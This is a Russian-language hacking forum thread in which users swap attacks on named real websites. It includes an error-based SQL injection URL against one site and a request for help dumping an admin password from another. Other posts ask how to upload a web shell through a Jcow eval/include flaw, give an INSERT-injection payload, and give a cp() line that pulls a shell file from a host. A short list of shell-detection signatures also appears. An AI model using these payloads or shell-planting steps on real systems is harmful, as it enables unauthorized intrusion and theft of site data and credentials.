Там несколько запросов Code: http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x
если консоль активна, то можно например так: Code: find / -type f -size +20k -name "*.php" выведет все пути до фалов с маской *.php размер которых более 20 кб. т.е. всо(~22 и ~67 кб) и всякие другие.
был у меня один скрипт,если найду,то выложу здесь! даже шелл нашёл который даёт такую функцию! скачать P.S. шелл проверь сначала!
o'clock, а серв не за ддосишь этим?) Ochki, PhPAntiVirus скачай, он не грузить серв вообще, сколько бы там не было файлов! Открой там virus.def и измени содержимое на Code: SHELL (base64_decode SHELL eval SHELL assert SHELL auth_pass
Нашел Post уязвимость на сайте http://mirbek-star.3dn.ru/load/audio/mirbek_atabekov_tan_syry_skachat_v_formate_mp3/1-1-0-51 Data:id=1&a=1&ajax=370 Что бы по быстрому добраться до базы использовал Havij и WebCruiser ни 1 не смог потому что символы там не понятные..пытается что то сблиндить и не как,есть варианты как пасс админа вытащить если символы не англ? Заранее спасибо.
alerondel, если сломаешь напиши в ПМ)))) А вообще как обнаружил, что есть уязвимость? Nightmarе, БД есть, но доступ не дают, насколько я помню, либо дают, но платно(дорого)!
Помогите залить шелл Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment" сам код: PHP: $app = $_POST['attachment']; if (strlen($app) && $app != 'status') { include_once('modules/'.$app.'/'.$app.'.php'); $c_run = $app.'::ajax_post();'; eval($c_run); exit; } есть эксплот под metasploit http://www.exploit-db.com/exploits/17722/ Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
Есть инъекция в INSERT INTO insert into TABLE (id, subid, date, data) values ('666', 'SQL', '', '') Можно что-нибудь извлечь из этого? Запрос комментариями не обрезается. MQ off
Вот может тебе эта статейка поможет?! _http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html P.S: кинь ссылку в пм глянуть
А где-то подсмотреть результаты инсерта можно? то почему бы просто не сделать вот так? insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '') ну и селект не из это же таблицы, помним)
это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)